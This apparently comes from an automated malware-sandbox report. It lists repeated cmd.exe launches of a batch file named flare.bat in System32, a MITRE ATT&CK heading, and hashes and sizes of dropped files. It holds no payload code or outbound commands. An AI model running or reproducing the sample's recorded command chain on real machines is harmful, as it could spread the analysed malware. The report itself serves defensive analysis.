C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\flare.bat1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
142B
MD5a918e39e90540829b11e66ea68102b54
SHA1b42ac88ad6a6d4fe99460a99b286748003a5326e
SHA256007f1e45ce7381c2bdc57c7f4bce9be2d471dc9c76ebf520e0f7338359787435
SHA51208165746cae6ee71f4a0e8a268cc1b88e26b5e1ffa266905d1005ffe361d61de6b116974e2c3bbd25b8bbbe86a418968192bf28bf6013883f049a1e678c2eeb1
-
Filesize
237B
MD529871f22521d0ab5777e9dfc20fc9c55
SHA1afe0417165c9011c338b416f4eaaddca0cf7fc52
SHA256808a5b00ba85be2d7d6a2b23389b160ed0fa7635508c564af1bf8784a2edede6
SHA512c90a432df0da718fdb8b2ae98c6675da113333d810ad91ca57150e24a5d104cca02f849d242a6c2a45dc48172be623a63f19a2c7aae421a2cf42bb08f302e888
-
Filesize
222B
MD557fe33d80dcbca1a7197e0f9585a012c
SHA1565083128a54d6d4f4fc48c39879811732612a04
SHA25641da8677898bb6bdd195537b97128e6f5eb34203a83792871fb2a955daaf5c48
SHA5122c5c67720f6a4b1fd8c5874a0e01883de40d4553b8f0606a482c2d4960e94afa5a634ef755e2861b11fa4a4fe54fa701e0ed8122434a9eca4ff0b06bb48b2b99
-
Filesize
36B
MD59ea9c312f34cfeda8394b84c0dfd1fc9
SHA1d587d14e675fa07820e4a3c513285b42831c90bf
SHA2564bfc6d2ad894c24dcedc920096679c80c1dd4340528ba9a071cff8b9bf8ab9e7
SHA5120ed43563d7e3492773d30abdad9199b5cb9fd49ffb32c0c0a9cc1471545991131644b81c61f70f0f062ee9ab5314005b7677982c8074696aa832b226cd32ca8d
-
Filesize
85B
MD506f0a7e183c60d2d25359f8805ac79c8
SHA188dcb58b0342aaa5d26fbcc4f331980280d8788e
SHA256c4ee6d94b5725af6c1ed91eb62fc34db9be62aca661976a5c24bdbb3db24e1d6
SHA512ee60f735fcee65e0c76a9240b660bb850f285900d5229dcf102d244e14248b24f5f102523efee659f4de6ac339fa1f554e36a712bd3209a4f3ab1897a63314b3
-
Filesize
3KB
MD597422af7164bd8af68e3ff991ed685a5
SHA146f9d4c9eb4be48b0579d9b5ce01ef0fed7cf3e4
SHA2563e45ddc08bb9c1604b399fd5e43546877bc0c290df087dd2697816b8eeadabaf
SHA51272a36da2099eb75da04bd0df431a67d2447eb25179339c6772946d64bc8fe1d4fc9b6fee5c43a18724baf4026c8fc8bd6e280c05d6216944be77892b876ea15e
-
Filesize
11B
MD59905e5a33c6edd8eb5f59780afbf74de
SHA164b2cd0186ff6fe05072ee88e2bb54476023772e
SHA256c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3
SHA512e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e
-
Filesize
18B
MD58b3a1957ded53805b739465423d33bc7
SHA102c9891db67a70a91f36de9721da4807dd246520
SHA256d32fe27f6c04b4f847a888bd1beb9e59154070c669dcc42bc0ffe3ac5956c2f1
SHA5126e3da11c4cbcf2ed8823de02d4cdec88ce3eb184e8506c84fe16e4034a77598ac3b506f10909997e4d0b67bd9e62819e5a3d6eaa2f2e35f3af60e08850ba5b11
-
Filesize
197B
MD57db67928e3dff650c0c64df10a3d8f61
SHA1c49b34fed78cea97c12301bb0c5af4e56f193c19
SHA25681826cb61c55e2d58192d9aa825715bac5e8483afe008fd516f0807099ec576c
SHA512779c9a9ad6e31ffe3d3dc026c7fc4aa9295b97228036d63a6b03d3ab9bde479c54a46212ee7f7bb898c293dbb30d2757850e5cb289e3570872b82cca611963f6
-
Filesize
221B
MD5a22746c3949f71565f54a3e82c7d7f9f
SHA170e899c1ad366cbdbf0fbbc423d8cba1ba85e84c
SHA256c9aebb3a65dd1633b028ff086e409e5c0c8706c79f6282b8b65512124ba4e94d
SHA5122ec3049ffdc6093535dcb991460ddf1f6d63af7e801499de299ea029b7842a207bc5cae7786c9e12a78e9abeea12a1c03ddacf4bb068bfd66e4836b8773a3a56
-
Filesize
232B
MD594e763c6a5bd186423b1f1bcd20dc1c3
SHA1edae8b6df34386de7d734e392586eaa2e7b16289
SHA256f72d1c83c8f292b01d84d4b73a0624465f32f38300b8b8fcc0313b25d38dec5e
SHA5121ea6fe28dc6be012201ae5ead4482cd64b142420279c3a9e8075e2057806e8df746ef03ef24b5730f44ff189174f6ff8860e24946f2c118cc84f4d5cc2ab9638